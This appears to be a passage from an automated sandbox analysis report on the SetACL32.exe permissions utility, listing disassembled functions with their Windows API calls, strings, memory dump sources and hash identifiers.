                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                • API String ID: 1737263090-3371799133
                • Opcode ID: 8b74ea20a9cff8556678376bf53193a31944464f47b401f12ef0a1188af2513c
                • Instruction ID: 2a20713e05d0b34ec98ec933576fbd4e7fbe39e64a97d202e119a35b58a8524f
                • Opcode Fuzzy Hash: 8b74ea20a9cff8556678376bf53193a31944464f47b401f12ef0a1188af2513c
                • Instruction Fuzzy Hash: 8F020570E00248DFEB14EF68CD85BDDB771EF84304F108699E409AB296D779AA84DF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA17CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00FA0F61: GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00FA0FA9
                • WriteFile.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,?,?,00000008,?,?,?,?,?), ref: 00FA191D
                • GetLastError.KERNEL32(?,?,00000008,?,?,?,?,?), ref: 00FA1927
                • __dosmaperr.LIBCMT ref: 00FA196C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ConsoleErrorFileLastWrite__dosmaperr
                • String ID: @M)w
                • API String ID: 251514795-1211491014
                • Opcode ID: 5555fd980d497e7f68b33f7aed6b8a7dfef7f50bd3b3b9e077ebc39f75b64870
                • Instruction ID: e0c98cd194da3f07394169e6fe13966a862b2686a01d44200eb9f8e3da143e84
                • Opcode Fuzzy Hash: 5555fd980d497e7f68b33f7aed6b8a7dfef7f50bd3b3b9e077ebc39f75b64870
                • Instruction Fuzzy Hash: A851B2B2E00209AFEF109FA4CC45BEFBBB9FF4A320F1A0555E500AB151D6789D45EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9D657 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00F9D76C
                  • Part of subcall function 00F9D578: __alloca_probe_16.LIBCMT ref: 00F9D5CB
                  • Part of subcall function 00F9D578: __freea.LIBCMT ref: 00F9D62D
                • _free.LIBCMT ref: 00F9D6C2
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • GetLastError.KERNEL32(?,?,00000000,?,00000000), ref: 00F9D6FD
                  • Part of subcall function 00F97FB2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F973C2,00000001,00000364,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F97FF3
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorHeapLast_free$AllocateFree__alloca_probe_16__freea
                • String ID: @M)w
                • API String ID: 948322168-1211491014
                • Opcode ID: 66fa59e8639fff8dcb66a00f90042c6b9bf3b68be6fb16a7f702a2bc8dc5c18d
                • Instruction ID: 5c012e1da991558958b7cfa92acaaddafbb3c8176476076401c3083cf0613e8d
                • Opcode Fuzzy Hash: 66fa59e8639fff8dcb66a00f90042c6b9bf3b68be6fb16a7f702a2bc8dc5c18d
                • Instruction Fuzzy Hash: F8416171D00229ABEF21AF658C41F9A7BB9BF45360F244095F809E7191EA35CD50EB72
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F95D72 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
                • API String ID: 0-2065372476
                • Opcode ID: 522143728f6c35b8cbf888824a6d3ccfee1f5b2ac2902bf1fd5f3af07480d40d
                • Instruction ID: 94b8f641892cdace3f77291a045f00a30bce8956fa86328045e4686dcd1347ac
                • Opcode Fuzzy Hash: 522143728f6c35b8cbf888824a6d3ccfee1f5b2ac2902bf1fd5f3af07480d40d
                • Instruction Fuzzy Hash: 89315F71E00619ABEF26AF99DD85D9EBBF8EB89B10F100066E504D7251D7719F00EB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F6E5DB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                Download Yara Rule
                APIs
                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00F6E5FC
                Strings
                • Operating system error message: , xrefs: 00F6E69D
                • SetACL error message: , xrefs: 00F6E61F
                • SetACL finished with error(s): , xrefs: 00F6E5F4
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: SimpleString::operator=
                • String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
                • API String ID: 356670603-3876775778
                • Opcode ID: 094f4ec287b739206af72fa3e4b00bd8744704ca06a1bc86c6c6323fe36fa52d
                • Instruction ID: 13599f4497f114c79908b45a19b3eac8ca5d2e6340f367a6e3ea4bbba2d46550
                • Opcode Fuzzy Hash: 094f4ec287b739206af72fa3e4b00bd8744704ca06a1bc86c6c6323fe36fa52d
                • Instruction Fuzzy Hash: EE31C531D04648CADF05DFA4C9127EDB7B0AF65308F148198E41577192EB74AB49DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F82EA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                Download Yara Rule
                APIs
                • GetAclInformation.ADVAPI32(00000000,746D712B,0000000C,00000002,?,?,?,?,00000000), ref: 00F82EE7
                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00F82EF1
                • GetAce.ADVAPI32(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00F82F26
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorInformationLast
                • String ID: @M)w
                • API String ID: 3635006208-1211491014
                • Opcode ID: 25fd3ea87f6a48c27caf662fcac852dd3f651eebd408e2e9205c311347891b0e
                • Instruction ID: cc4e43d91b385df40196678e4c0d4d5fd30a81e6867aceea3a5927affb320c4b
                • Opcode Fuzzy Hash: 25fd3ea87f6a48c27caf662fcac852dd3f651eebd408e2e9205c311347891b0e
                • Instruction Fuzzy Hash: D6218E71A0021E9BDB00EFA5DD85BEFBBF8FF09310F00456AE905A7240D770A914EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F67240 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64memoryCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AllocErrorLast
                • String ID: @M)w$tss
                • API String ID: 4252645092-3011810122
                • Opcode ID: ac3285ae22d05746404dbe63b62d570a06b2ca4dd3c480f91a98fccb2292d7ee
                • Instruction ID: 7e0f38efecdb80236c7e62f40e9e8a7ec37ec6c2de9814c9c6218cae32ef3be4
                • Opcode Fuzzy Hash: ac3285ae22d05746404dbe63b62d570a06b2ca4dd3c480f91a98fccb2292d7ee
                • Instruction Fuzzy Hash: 7B016BB19047105BC7217B28EC0258BBBD4DF42334F104639FC5883392E7319904BBE2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA46DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • CloseHandle.KERNEL32(00000000,00000000,00000010,?,00FA460A,00000010,00FC7478,0000000C,00FA46BC,?), ref: 00FA4732
                • GetLastError.KERNEL32(?,00FA460A,00000010,00FC7478,0000000C,00FA46BC,?), ref: 00FA473C
                • __dosmaperr.LIBCMT ref: 00FA4767
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CloseErrorHandleLast__dosmaperr
                • String ID: @M)w
                • API String ID: 2583163307-1211491014
                • Opcode ID: b20e98ceb10a7040ea7804ff3a1d03bc82b7c94aeac8b840db58dd210673bd72
                • Instruction ID: 16927af79c95b5847e50c6394820c177eff96b756e6b5814baf06c0ff70d5cfe
                • Opcode Fuzzy Hash: b20e98ceb10a7040ea7804ff3a1d03bc82b7c94aeac8b840db58dd210673bd72
                • Instruction Fuzzy Hash: F1012BB3E0426816C62027346C4AB7E778D8FD3B30F250149F908871D2DFE9AC81B555
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F89C10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • MapGenericMask.ADVAPI32(?,00120089), ref: 00F89C68
                • MapGenericMask.ADVAPI32(?,00020019), ref: 00F89C8C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: GenericMask
                • String ID: 9$?
                • API String ID: 3675760450-2473970582
                • Opcode ID: 31767bf69fcfda5e149142af2f99b4d6f469a4a7d385510ba9c7cf9f3bb90399
                • Instruction ID: ebccbed02c0d53885a46f9f62469bc6e637b4ebc0a4bcc70717cde6c4dd9d4d4
                • Opcode Fuzzy Hash: 31767bf69fcfda5e149142af2f99b4d6f469a4a7d385510ba9c7cf9f3bb90399
                • Instruction Fuzzy Hash: 6D112E70E0021CDF8F01DFD5EA855EEBBF8EB0C314F50019AE905B7201DB769A589B91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA4004 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • SetFilePointerEx.KERNEL32(00000000,?,00000002,00000000,00000000,?,00000000,?,?,?,00FA40B1,00000000,?,00000002,00000000), ref: 00FA403D
                • GetLastError.KERNEL32(?,00FA40B1,00000000,?,00000002,00000000,?,00FA1855,00000000,00000000,00000000,00000002,?,00000000,00000000), ref: 00FA4047
                • __dosmaperr.LIBCMT ref: 00FA404E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFileLastPointer__dosmaperr
                • String ID: @M)w
                • API String ID: 2336955059-1211491014
                • Opcode ID: b28dd0a5b0320a523aaca37e5094e01764af1b8f341a08ac6e294811c2a67f30
                • Instruction ID: a09e2e076b0294c8d6b98befa575e32ebdf9f24864b6282ba744745e57412569
                • Opcode Fuzzy Hash: b28dd0a5b0320a523aaca37e5094e01764af1b8f341a08ac6e294811c2a67f30
                • Instruction Fuzzy Hash: 3D012873B00118ABCF059FA5DC059AE3F2DEBC6330B244208F6119B1D0EA71ED00BB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8DF4E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,00F8CF3F), ref: 00F8DF5C
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F8DF6A
                • SetLastError.KERNEL32(00000000,?,00F8CF3F), ref: 00F8DF73
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$Value___vcrt_
                • String ID: @M)w
                • API String ID: 483936075-1211491014
                • Opcode ID: 5b3808d389ea20ce1f847bf894fd50f994fbe2a83334d2f0820b06b8ac36e237
                • Instruction ID: 06fab655b7a61ad1c535c14823eaa4f2aeadeaa6d59dd9d3a94753d7c364b3b5
                • Opcode Fuzzy Hash: 5b3808d389ea20ce1f847bf894fd50f994fbe2a83334d2f0820b06b8ac36e237
                • Instruction Fuzzy Hash: B7D01272A5411A9A8B106B75FC0E9D937AAFA863323144B35F119C30D0D778A44AF750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9B3E1 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _strrchr
                • String ID:
                • API String ID: 3213747228-0
                • Opcode ID: 8cfee91b874d94bb0ae32828812be3aaa306158111786b4fa842ad49fdcac14d
                • Instruction ID: bf9372e2cefd7d54f8fd4e2c24b2f6a201fd8eb3dd147cd6fb76d3fd2cef4990
                • Opcode Fuzzy Hash: 8cfee91b874d94bb0ae32828812be3aaa306158111786b4fa842ad49fdcac14d
                • Instruction Fuzzy Hash: 0BB14532D006459FEF11CF68D981BAEBBF5EF55310F1981AAE845DB242D7389E01EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F76A53 Relevance: 6.3, APIs: 4, Instructions: 274registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F74BF0: std::locale::_Init.LIBCPMT ref: 00F75AA6
                • RegEnumKeyExW.ADVAPI32 ref: 00F76ACB
                • RegEnumKeyExW.ADVAPI32 ref: 00F76BD2
                • RegCloseKey.ADVAPI32(?), ref: 00F76BFB
                • RegCloseKey.ADVAPI32(?), ref: 00F76C17
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CloseEnum$Initstd::locale::_
                • String ID:
                • API String ID: 557558298-0
                • Opcode ID: 81d413b7d3b32ab90d69c1aad0581d8a3c884315414ff054a07002076833de12
                • Instruction ID: 4f77f3e423197897100fcb99c44011794c9d537b6459d422d14eee68669a97c9
                • Opcode Fuzzy Hash: 81d413b7d3b32ab90d69c1aad0581d8a3c884315414ff054a07002076833de12
                • Instruction Fuzzy Hash: 54A10171E002089FDB14CFA8DC85BDEBBB5FF44304F14821AE809EB291DB74A944DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8DFD3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: 457f504dfffd99d287f1e27ddf86bc5f94e5adcef2e714907a0db2a20d0d2c84
                • Instruction ID: 9a119b9ea7527924dab82f6efd6ab588c0121d6d81e12b3905a09f58ed80ea30
                • Opcode Fuzzy Hash: 457f504dfffd99d287f1e27ddf86bc5f94e5adcef2e714907a0db2a20d0d2c84
                • Instruction Fuzzy Hash: 8C510272A04606EFEB29BF54D845BFA77A4EF00320F24492DE84587291E775EC80FB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F878C0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                Download Yara Rule
                APIs
                • IsValidSid.ADVAPI32(00F746E3,?,?,?,?,00F746E3,?), ref: 00F878D6
                • IsValidSid.ADVAPI32(00F746E3,?,?,00F746E3,?), ref: 00F878F2
                • GetLengthSid.ADVAPI32(00F746E3,?,?,00F746E3,?), ref: 00F878F9
                • CopySid.ADVAPI32(00F746E3,00000000,00F746E3,00F746E3,?), ref: 00F87918
                  • Part of subcall function 00F93434: _free.LIBCMT ref: 00F93447
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$CopyLength_free
                • String ID:
                • API String ID: 2555587749-0
                • Opcode ID: 2f71743a81b7251db3a4d0bf3c133d20c01e2593560af7b8a38591d6ee9a4862
                • Instruction ID: 0e32bc17f9ed7f73bbbc613e45b20893fe72a91a990ac446fe5c3b7704c213d9
                • Opcode Fuzzy Hash: 2f71743a81b7251db3a4d0bf3c133d20c01e2593560af7b8a38591d6ee9a4862
                • Instruction Fuzzy Hash: 9A01B1B2A0522467EF217B65AC84FABBA9CDF42BB0B150036F904DB200E675D801E7F1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F87820 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                Download Yara Rule
                APIs
                • IsValidSid.ADVAPI32(00000000,00000000,00000000,00F89605,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8783E
                • IsValidSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8784B
                • GetLengthSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F87852
                • CopySid.ADVAPI32(00F897F0,00000000,000C46C7,00F897F0,00F89605,00000000,000000FF), ref: 00F87871
                  • Part of subcall function 00F93434: _free.LIBCMT ref: 00F93447
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$CopyLength_free
                • String ID:
                • API String ID: 2555587749-0
                • Opcode ID: 1713b0fbe4d513f1488fd09b782cc7e0c44c19e426be3f77b428092a91ab5a40
                • Instruction ID: aa390b7b1592acc16b829c2c3312b60765b48008a09dceac6dd04d46e09a6f3a
                • Opcode Fuzzy Hash: 1713b0fbe4d513f1488fd09b782cc7e0c44c19e426be3f77b428092a91ab5a40
                • Instruction Fuzzy Hash: 71015EB2B053256BEB106F66AC88B97BB9CAF557A1F244032FA08D7200E775D811D7F0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F6A9A0 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00FC7820), ref: 00F6A9AB
                • ResetEvent.KERNEL32(?,?), ref: 00F6A9E8
                • ReleaseMutex.KERNEL32(?), ref: 00F6A9F1
                • SetEvent.KERNEL32(?), ref: 00F6A9FA
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Event$MutexObjectReleaseResetSingleWait
                • String ID:
                • API String ID: 2375943032-0
                • Opcode ID: 71128a0be726d260fd6113f5299be3edbd45f4688b3bd28ca35bd73b00e64f77
                • Instruction ID: 4eb6150e07a6cfef13f52ffe59b61f7275dd2831906f2c93f3c3618ef7c1ff53
                • Opcode Fuzzy Hash: 71128a0be726d260fd6113f5299be3edbd45f4688b3bd28ca35bd73b00e64f77
                • Instruction Fuzzy Hash: 640137B0500605DFD7249F21DC18A26BBE4FF06720B10C92EE5AA8B6A1EB71A850EF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8B4F3 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                Download Yara Rule
                APIs
                • SleepConditionVariableCS.KERNELBASE(?,00F8B490,00000064), ref: 00F8B516
                • LeaveCriticalSection.KERNEL32(00FCAA14,?,?,00F8B490,00000064,?,00F6769F,00FCB698,00F67269), ref: 00F8B520
                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00F8B490,00000064,?,00F6769F,00FCB698,00F67269), ref: 00F8B531
                • EnterCriticalSection.KERNEL32(00FCAA14,?,00F8B490,00000064,?,00F6769F,00FCB698,00F67269), ref: 00F8B538
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                • String ID:
                • API String ID: 3269011525-0
